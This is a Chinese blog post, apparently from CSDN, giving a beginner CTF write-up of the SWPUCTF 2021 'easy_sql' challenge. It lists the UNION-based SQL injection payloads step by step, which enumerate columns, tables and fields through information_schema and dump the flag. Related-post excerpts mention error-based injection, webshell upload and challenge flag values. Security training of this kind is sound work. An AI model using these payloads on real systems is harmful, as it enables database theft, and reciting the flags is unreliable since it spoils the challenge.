SWPUCTF 2021 新生赛]easy_sql

最新推荐文章于 2024-09-07 20:59:27 发布
最新推荐文章于 2024-09-07 20:59:27 发布
阅读量153 收藏 2
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80499103/article/details/136271838
版权
本文讲述了作者通过分析源代码发现的字符型漏洞,逐步进行SQL注入攻击,测试并获取了数据库中的表名、字段名和敏感信息的过程,展示了如何利用技术手段进行安全评估。
摘要由CSDN通过智能技术生成

1.f12打开源代码,发现要求我们传的参数是wllm2.首先输入?wllm=1,出现以下界面,说明回显正常输入?wllm=1' ,出现报错,说明为字符型漏洞

分别输入

  ?wllm=1’ order by 3--+?wllm=1’ order by 4--+

发现不存在4列,存在3列

输入?wllm=-1' union select 1,2,3--+查看回显输入?wllm=-1' union select 1,2,database()--+

输入?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

查看test_db的表

输入?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

查字段

输入 -1' union select 1,2,group_concat(id,flag) from test_tb--+ 

查看flag的字段,得到密码。

2301_80499103
关注
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 840
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 675
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(REVERSE篇)
jameshuangchuan的博客
08-10 2654
str.zfill(width)根据width长度对str进行切片,那么此题中的注释可以看出,result。真的麻,年轻时没有好好学习,后果就是一把年纪重新捡起这些玩意看到程序就头皮发麻……hex()用于将10进制整数转换成16进制,以字符串形式表示。ord()用来返回对应字符的ascii码。此处主要在NSSCTF平台(
SWPUCTF 2021 新生
weixin_44770698的博客
12-21 3879
SWPUCTF 2021 新生(日常练习)
[SWPUCTF 2021 新生]jicao
2301_80243833的博客
07-24 421
json是HTTP GET请求中的一个参数,这行代码将其作为json字符串解析成PHP数组,并赋值给$json变量。由此可得本题flag为:NSSCTF{e973c35a-705d-4039-a419-2b772370ed5b}在json中,键是一个字符串,值可以是字符串、数字、布尔值、数组、嵌套的json对象或null。这行代码从HTTP POST请求中将名为 id 的参数的值存储在 $id 变量中。json对象是一种存储数据的方式,它使用键值对的形式表示数据。前两行代码不重要,从第三行开始分析。
[SWPUCTF] 2021新生之Crypto篇刷题记录(11)
Aluxian_的博客
05-12 2057
【代码】[SWPUCTF] 2021新生之Crypto篇刷题记录(11)
[SWPUCTF 2021 新生]第一波放题(nssctf刷题)
weixin_63231007的博客
04-09 9044
[SWPUCTF 2021 新生]jicao json_decode介绍: json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_decode — 对 JSON 格式的字符串进行编码 说明 mixed json_decode ( string $json [, bool $assoc ] ) 接受一个 JSON 格式的字符串并且把它转换为 PHP 变量 参数 json 待解码的 json string 格式的字符串。 asso
[SWPUCTF 2021 新生] (WEB一)
2202_75317918的博客
05-22 950
[SWPUCTF 2021 新生] (WEB一)
[SWPUCTF 2021 新生]easy_sql
zoixsoadji的博客
05-06 1460
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2904
此处主要在NSSCTF平台()上开展刷题。
[SWPUCTF 2021 新生]web方向(一到六题) 解题思路,实操解析,解题软件使用,解题方法教程
最新发布
符啸九天的博客
09-07 353
[SWPUCTF 2021 新生]web方向 解题思路,实操解析,解题软件安装教程,解题方法教程。 [SWPUCTF 2021 新生]gift_F12、[SWPUCTF 2021 新生]jicao、[SWPUCTF 2021 新生]easy_md5、[SWPUCTF 2021 新生]include、[SWPUCTF 2021 新生]easy_sql
NSSCTF crypto [SWPUCTF 2021 新生]
m0_67288607的博客
03-19 947
[SWPUCTF 2021 新生]crypto
[SWPUCTF 2021 新生]easyrce
2303_77293157的博客
07-15 321
函数是 PHP 中一个非常有争议和危险的函数。它允许你执行一个字符串形式的 PHP 代码。这意味着任何可以访问你的脚本的人都可以通过。看到了flllllaaaaaaggggggg,猜测flag在里面,查看。函数是用来执行系统命令的。当您需要执行外部程序或命令时,可以使用。它的参数是一个字符串,其中包含了您想要执行的命令。数组通常用于存储通过URL传递给PHP脚本的查询参数。执行他们想要的 PHP 代码。参数存在,这行代码会执行。知道了这些就可以做题了。数组中是否有一个名为。
[SWPUCTF 2021 新生]PseudoProtocols
2301_80243833的博客
07-31 230
data:// 数据流封装器,以传递相应格式的数据。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。代码的大概意思为:变量a用file_get_contents()函数,以只读的方式打开,如果内容等于’I want flag’的话,输出flag。并且我们发现url中有参数wllm,由题目标签php伪协议,我们尝试用php伪协议读取该文件。php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。
[SWPUCTF 2021 新生]easyupload1.0
yeah123_的博客
07-23 260
我们发现,一句话木马上传成功,木马写进去就可以连接蚁剑了。我们将1.jpg改为1.php看是否上传成功。我们尝试打开终端,在终端中进行查找。首先,我们先上传一句话木马图片。题目考察类型:文件上传。服了,不给我flag。
[SWPUCTF 2021 新生] 第三波放题
weixin_63231007的博客
04-12 6962
[SWPUCTF 2021 新生]easyupload3.0 首先弄个报错出来,随便弄一下,比如弄出一个not found页面,发现是Apache/2.4.7 (Ubuntu) ,既然是 Apache,于是就利用.htaccess来getshell。 建一个.htaccess 文件,里面的内容如下: <FilesMatch "123.jpg"> SetHandler application/x-httpd-php </FilesMatch> 这样的话对文件名包含“123.jp
CTF刷题第一周
qq_62660611的博客
11-10 1861
第一周刷题记录
SWPU新生2021 Web部分WriteUp
mumuzi的博客
10-11 4315
第一波放题 gift_F12 直接F12之后搜flag WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft} caidao 基操题,就不用菜刀,蚁剑直接连,密码wllm,地址就访问的地址,进去在根目录找到flag jicao 搜一下json就会了,我开始其实也不会…我开始get了一个{“json”:“wllm”} 。。。 get:?json={“x”:“wllm”} post:id=wllmNB Do_you_know_http 浏览器WLLM,改User-A
ROS手眼标定教程:easy_handeye与viso2结合实现
"这篇文档详细介绍了使用ROS库easy_handeye进行手眼标定的过程,特别提到了相机位置的重要性,以及内参和外参标定的步骤。文档适用于带有USB摄像头的anno六轴步进机械臂,涉及到的关键软件包包括ros-kinetic-visp、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值